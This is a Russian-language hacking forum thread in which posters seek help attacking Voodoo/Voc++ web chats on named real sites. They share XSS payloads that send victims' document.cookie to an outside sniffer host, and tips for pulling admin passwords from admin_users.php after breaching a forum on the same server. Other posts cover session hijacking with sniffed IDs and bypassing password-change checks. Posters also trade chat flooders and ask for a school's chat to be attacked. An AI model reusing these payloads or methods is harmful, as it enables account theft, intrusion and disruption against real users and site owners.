Народ, помогите пожалуйста с http://chat.gtn.ru там есть Code: http://chat.gtn.ru/go.php?url=javascript:alert(/document.cookie/) формирую запрос: Code: http://chat.gtn.ru/go.php?url=javascript:img%20=%20new%20Image();%20img.src%20=%20"http://s.netsec.ru/schut123.gif?"+document.cookie но на сниф ничего не приходит. так-же там есть Code: http://chat.gtn.ru//password_reminder.php?look_for=%3Cscript%3Ealert(document.cookie);%3C/script%3E> формирую запрос: Code: http://chat.gtn.ru//password_reminder.php?look_for="><script>img%20=%20new%20Image();%20img.src%20=%20"http://s.netsec.ru/schut123.gif?"+document.cookie;</script> На снифере никакого эффекта. Пусто. Подскажите, как быть.. Возможно я неправильно запрос составляю. Или что-то еще..
А как тогда можно админку получить? Насколько я понимаю сули там тоже нет... Помогите найти уязвимости в этом чате, которыми можно реально воспользоваться.
По делу нет, а вот что бы такой чат похекать, надо хекать форум, канечно если такой есть, на том же сайте что и чат, БД одна на всех, мне это как то давно подсказали, и именно тогда получилось достать логины и пассы от админок в чате, а форум полет от sql inj.
дело говоришь..не только дело не в бд......самый простой спрособ взломать вуду енто найти на бажный форум, или стартовую(обычно стоят дефаил) потом лезишь сюды /home/****/public_html/chat/admin/admin_users.php а там проль в админку лежит в каком виде , <?php $admin_users[0]["nickname"] = "***"; $admin_users[0]["password"] = "****"; ?> самый простой способ!)
привет парни! у меня проблема из таким чатом!!! я не могу восползоватса сесией !я из Укр. я перехватил сесию и немогу ей воспользоватса!!
получал доступ по ИД сессии ИД получал при помощи снифера все просто очень жаль что чат который меня интересует при смене пароля требует старый пароль поэтому даже с панели управления ник не угнать. только напакостить можно давайте вместе подумаем как обойти подтверждение старого пароля при смене оного
кто может дать сниффер???? дам мазгадёра для воодоо. принцип работы: автоматом заходит на чат и выходит из чата а в чате пишется например 12:01:01 Вася зашел 12:01:02 Вася вышел 12:01:03 Вася зашел 12:01:04 Вася вышел и этим чат заполняется а админ не может выгнат потому что сессия каждый раз меняется можно выгнать через offban если есть _________________________ и почему никто не пишет что если захватить сессию можно и "voc.php?session=сессия" написать и зайти. откроется весь чат а не только sender.php и есть кто нибудь с кем можно было бы посаветоватся по темам ява, пхп
skajite rebiata shtoza versia http://www.akoce.com i kak mne dastats hash admina ia sdelal xss no kinul mne svou hash no ia xochu hash admina voobshem versiu skajite ((
обычный вуду тока с обложкой красиваой! язык на чате фиг его знает орабский какойто! версия 0.18.16 -=-=-=-=-=-=-=-=-= NModern закинь сюда мазгадёра а в чате пишется например 12:01:01 Вася зашел 12:01:02 Вася вышел 12:01:03 Вася зашел 12:01:04 Вася вышел и этим чат заполняется
Всем привет! Ребят, протестите плиз вот этот чат http://licey24.lipetsk.ru/chat Админ полный ламер, недавно хоть догодался закрыть директорию http://licey24.lipetsk.ru/data через .htaccess
У меня хоть и не большие познания в javascript могу я следующим образом получить куки пользователя: Кидаю к примеру ссыль юзеру в чат http://site.ru/file.html file.html содержит следующий код PHP: <a href="http://chatname.ru/go.php?url=javascript:window.location.href='http://site.ru/sniffer/'">Click</a> Т.е смысл следующий юзер щелкает по ссылке и переходит по адрксу http://site.ru/file.html, оттуда он переадресуется на страницу чата http://chatname.ru/go.php, выполняется java script по переходу на страницу со снифером, снифер читает куки Такое реально???
а флудера так и нет рабочего? на Voc++ бизнес едишен ни 1 флудер из сдешних неработает) ещё недавно гдето тут был программой (не скриптом) флудер! работал ещё! сейчас зашёл хотел приколоться в стареньком чате) ан нет! тоже не работает)))) ну что мож кто что подскажет?
